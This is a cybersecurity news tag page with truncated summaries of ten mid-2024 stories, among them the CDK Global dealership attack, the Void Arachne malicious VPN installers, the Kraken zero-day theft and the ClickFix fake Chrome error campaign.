Tag: latest cybersecurity news

CDK Global cyberattack impacts thousands of US car dealerships
News

CDK Global cyberattack impacts thousands of US car dealerships

Massive hack forces CDK Global, a provider of software-as-a-service for car dealerships, to shut down its servers, leaving customers unable to run their businesses as usual. A SaaS platform from CDK Global serves clients in the auto sector, managing all facets of vehicle dealership operations, such as inventory management, CRM, financing, payroll, support, and servicing. The organization employs thousands of people nationwide and is utilized by more than 15,000 auto dealerships in North America. Car dealerships set up an always-on VPN to the SaaS provider's data centers in order to use CDK's services, which grants their locally installed apps access to the platform read more about CDK Global cyberattack impacts thousands of US car dealerships. Get up to date on the latest cybe...
New Threat Actor ‘Void Arachne’ Targets Chinese Users with Malicious VPN Installers
News

New Threat Actor ‘Void Arachne’ Targets Chinese Users with Malicious VPN Installers

A never-before-seen threat activity cluster nicknamed Void Arachne is targeting Chinese-speaking users. It uses malicious Windows Installer (MSI) files for virtual private networks (VPNs) to distribute the Winos 4.0 command-and-control (C&C) framework. In addition, the campaign pushes AI voice and facial technology, compromised MSI files bundled with deepfake pornography-generating software and nudifiers, according to a technical report released today by Trend Micro researchers Peter Girnus, Aliakbar Zahravi, and Ahmed Mohamed Ibrahim. The effort disseminates malware via social media, messaging apps, and [Search Engine Optimization] poisoning techniques. The security provider claimed that the assaults involved promoting well-known programs like Google Chrome read more New Thr...
UNC3886 Uses Fortinet, VMware 0-Days and Stealth Tactics in Long-Term Spying
News

UNC3886 Uses Fortinet, VMware 0-Days and Stealth Tactics in Long-Term Spying

Multiple persistence strategies have been seen to be used by the China-nexus cyber espionage actor connected to the zero-day exploitation of security weaknesses in Fortinet, Ivanti, and VMware devices to keep unrestricted access to compromised environments. According to a recent analysis from Mandiant researchers, persistence techniques included network devices, hypervisors, and virtual machines and made sure that alternate channels remained accessible even in the event that the primary layer was identified and removed. UNC3886 is the threat actor in question, and the threat intelligence firm controlled by Google described it as "sophisticated, cautious, and evasive." The adversary's attacks have taken advantage of zero-day vulnerabilities including CVE-2022-41328 (Fortinet Forti...
Kraken Crypto Exchange Hit by $3 Million Theft Exploiting Zero-Day Flaw
News

Kraken Crypto Exchange Hit by $3 Million Theft Exploiting Zero-Day Flaw

The cryptocurrency exchange Kraken disclosed that an anonymous security researcher had taken advantage of a "very critical" zero-day vulnerability in its system to pilfer $3 million worth of digital assets, and was refusing to give them back. The researcher's defect Bounty program notice concerning a defect that "allowed them to artificially inflate their balance on our platform" was posted by Nick Percoco, Chief Security Officer of Kraken, on X (formerly Twitter). No further details were provided. The business claimed to have found a security flaw in minutes after receiving the notice, which essentially allowed an attacker to start a deposit on our platform and transfer money into their account before the deposit was completed read more about Kraken Crypto Exchange Hit by $3 Millio...
ONNX phishing service targets Microsoft 365 accounts at financial firms
News

ONNX phishing service targets Microsoft 365 accounts at financial firms

Using QR codes in PDF attachments, a new phishing-as-a-service (PhaaS) platform called ONNX Store targets Microsoft 365 accounts for staff members of financial institutions. The software uses Telegram bots to operate and has two-factor authentication (2FA) bypass techniques. It can target both Microsoft 365 and Office 365 email accounts. The activity was found by researchers at EclecticIQ, and they suspect that ONNX is a renamed Caffeine phishing kit run by the threat actor MRxC0DER, who speaks Arabic. When the platform began focusing on Russian and Chinese platforms rather than Western services in October 2022, Mandiant made the discovery of caffeine read more about ONNX phishing service targets Microsoft 365 accounts at financial firms. Get up to date on the latest cybersecu...
New Malware Targets Exposed Docker APIs for Cryptocurrency Mining
News

New Malware Targets Exposed Docker APIs for Cryptocurrency Mining

Researchers studying cybersecurity have discovered a new malware campaign that aims to send bitcoin miners and other payloads via publicly accessible Docket API endpoints. In a report released last week, cloud analytics platform Datadog stated that among the tools used were a remote access tool with the ability to download and run other dangerous applications as well as a utility to spread the virus via SSH. Tactical similarities between the effort and Spinning YARN, an earlier initiative that targeted incorrectly configured Apache Hadoop YARN, Docker, Atlassian Confluence, and Redis services for cryptojacking, have been found during campaign analysis. The threat actors focus on Docker servers that have exposed ports (port number 2375) at the beginning of the assault to launch a ...
Cybercriminals Exploit Free Software Lures to Deploy Hijack Loader and Vidar Stealer
News

Cybercriminals Exploit Free Software Lures to Deploy Hijack Loader and Vidar Stealer

Threat actors are using free or illegal copies of popular software to trick unwary users into downloading a malware loader called Hijack Loader, which then launches an information-stealing program named Vidar Stealer. In a Monday investigation, Trellix security researcher Ale Houspanossian stated, "Adversaries had managed to trick users into downloading password-protected archive files containing trojanized copies of a Cisco Webex Meetings App (ptService.exe)". The Cisco Webex Meetings application secretly loaded a covert malware loader that resulted in the execution of an information-stealing module when unwary victims extracted and ran a "Setup.exe" binary file. The initial step involves opening a RAR archive file that appears to be an executable named "Setup.exe," but is actua...
Signal Foundation Warns Against EU’s Plan to Scan Private Messages for CSAM
News

Signal Foundation Warns Against EU’s Plan to Scan Private Messages for CSAM

Meredith Whittaker, president of the Signal Foundation, which upholds the name-brand messaging service, alerted users to the serious risks to end-to-end encryption (E2EE) posed by a contentious proposal put forth by the European Union to scan users' private messages for detection of child sexual abuse material (CSAM). Encryption is seriously undermined when private communications are need to be scanned in bulk. Completely Stop," Whittaker declared on Monday in a statement. This can occur through various means, such as manipulating the random number generation process of an encryption algorithm, establishing a key escrow system, or compelling communications to go via a surveillance system prior to encryption read more about Signal Foundation Warns Against EU's Plan to Scan Private Me...
Fake Google Chrome errors trick you into running malicious PowerShell scripts
News

Fake Google Chrome errors trick you into running malicious PowerShell scripts

A recent malware distribution operation tricks users into running malicious PowerShell "fixes" that install malware by pretending to be problems with Word, OneDrive, and Google Chrome. Several threat actors were seen using the new campaign, including the ones behind ClickFix, a new attack cluster, and ClearFake. The TA571 threat actor is well-known for acting as a spam distributor that distributes enormous amounts of email, which can result in malware and ransomware outbreaks. Website overlays used in earlier ClearFake attacks trick users into installing malware-installing phony browser updates. In the new attacks, malicious actors also use JavaScript on hacked websites and HTML attachments read more about Fake Google Chrome errors trick you into running malicious PowerShell scri...
UK Man Suspected of Being ‘Scattered Spider’ Leader Arrested
News

UK Man Suspected of Being ‘Scattered Spider’ Leader Arrested

A 22-year-old British male was recently taken into custody in Spain on suspicion of being the group's commander in the infamous Scattered Spider cybercrime organization. On June 14, the Spanish news outlet Murcia Today announced that a British male who was not identified had been taken into custody in Palma de Mallorca while attempting to board a flight to Italy. The arrest was made possible by the FBI and Spanish police working together. The Scattered Spider cybercrime gang, whose members are primarily thought to be from the US and western nations, with a small number also from eastern Europe, was the subject of an FBI announcement in May that it was looking to charge members. A Florida 19-year-old who was one of the group's purported members was taken into custody in January. S...